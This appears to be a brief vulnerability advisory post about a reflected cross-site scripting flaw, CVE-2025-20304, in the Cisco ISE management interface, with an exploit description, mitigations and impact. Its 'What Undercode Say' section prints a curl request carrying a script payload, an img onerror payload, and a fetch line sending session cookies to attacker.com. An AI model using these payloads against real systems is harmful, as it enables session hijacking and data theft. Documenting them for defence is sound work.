Cisco ISE, Reflected Cross-Site Scripting, CVE-2025-20304 (Medium)

Listen to this Post

How the mentioned CVE works:

The vulnerability exists in the web-based management interface of Cisco Identity Services Engine (ISE) and ISE-PIC. It is caused by insufficient sanitization of user-supplied input. An authenticated attacker with low privileges can inject malicious JavaScript code into specific parameters of a web page. When an administrator or another user views the manipulated page, the malicious script is reflected and executed within their browser session. This execution occurs in the security context of the management interface, allowing the attacker to steal session cookies, perform actions on behalf of the user, or access sensitive information displayed in the interface.
Platform: Cisco ISE
Version: Multiple versions
Vulnerability: Reflected XSS
Severity: Medium
date: 11/05/2025

Prediction: Patch expected 01/15/2026

What Undercode Say:

curl -k -X GET "https://<ISE_IP>/admin/policyPolicy.htm?name=<script>alert('XSS')</script>" -H "Cookie: APPSESSIONID=<valid_low_priv_session>"
<img src=x onerror=stealCookies()>
fetch('https://attacker.com/steal?cookie=' + document.cookie)

How Exploit:

Attacker logs into a low-privileged account on the target Cisco ISE system. They then craft a malicious URL containing a script payload within a vulnerable parameter of the management interface. This URL is sent to an administrator, often via a phishing email. When the administrator, who has a valid session, clicks the link, the embedded script executes in their browser, allowing the attacker to hijack the session.

Protection from this CVE:

Apply Cisco-provided security patches. Implement Content Security Policy (CSP) headers. Sanitize all user-input on the server-side. Conduct regular code reviews for XSS flaws. Use browser XSS protection mechanisms.

Impact:

Session hijacking, unauthorized administrative actions, sensitive data theft, and potential full compromise of the Cisco ISE management system.
